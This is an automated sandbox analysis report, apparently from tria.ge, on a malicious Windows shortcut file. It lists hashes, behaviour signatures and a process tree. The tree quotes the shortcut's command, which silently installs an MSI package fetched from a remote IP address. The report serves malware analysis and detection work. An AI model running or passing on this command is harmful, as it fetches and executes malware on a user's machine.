Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

baff93a957...6f.lnk

windows7-x64

8

baff93a957...6f.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    07/06/2023, 02:45

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    baff93a9574ff019ad8a1cff0b712d6f.lnk

  • Size

    2KB

  • MD5

    baff93a9574ff019ad8a1cff0b712d6f

  • SHA1

    bf927b871abbc068b7030e0e7b79797fa7bce59d

  • SHA256

    fb48b9102388620bb02d1a47297ba101f755632f9a421d09e9ab419cbeb65db8

  • SHA512

    37c94879618003ef04c96c3e63f37f91a80393bdf220a7e6522a7f5a4cd46badc6542499c916d0a348c453125377ae9698d392ee2c79162da89e629f8ac95e2a

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\baff93a9574ff019ad8a1cff0b712d6f.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1364
    • C:\Windows\System32\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i http://185.166.217.184/JDXFHUIPGYN98P5GY87S43BF5TW4IYNP/attachment.msi /quiet
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      PID:112
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:560

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads